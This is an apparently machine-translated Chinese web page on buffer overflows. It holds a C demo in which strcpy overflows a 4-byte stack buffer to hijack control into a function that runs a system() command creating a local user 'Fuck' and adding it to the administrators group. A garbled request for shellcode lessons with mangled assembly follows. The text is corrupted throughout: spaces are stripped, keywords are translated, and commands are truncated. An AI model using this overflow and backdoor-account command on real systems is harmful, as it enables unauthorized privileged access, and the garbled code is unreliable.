一、c语言内存溢出我用C++编写了代码。如果用VC6编译,会立即添加一个名为“f_u_c_k”的用户名。该程序显示了由strcpy函数引起的堆栈溢出。堆溢出在Windows平台上比较复杂,因为Windows堆管理部分完全是一些安全爱好者设计的
#包括
使用.命名空间std;
void(*pfunc)();
voidshow()
{
system("cmd/cnetuserFuck123/ad&&netlocalgroupFuck管理员/ad");
exit(1);
}
intmain()
{
chara[4];
charshellcode[13]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
pfunc=show;
*(int*)&shellcode[8]=(int)pfunc;
//溢出
strcpy(a,shellcode);
return0;
![](https://img0.baidu.com/it/u=44552681,3582881869&fm=253.jpg)
二、汇编语言ShellCode的问题有同学能学shellcode吗?movesp,ebppushep//movebp,esp;将当前的esp赋值给ebp
![](https://img1.baidu.com/it/u=3119290477,396108584&fm=253.jpg)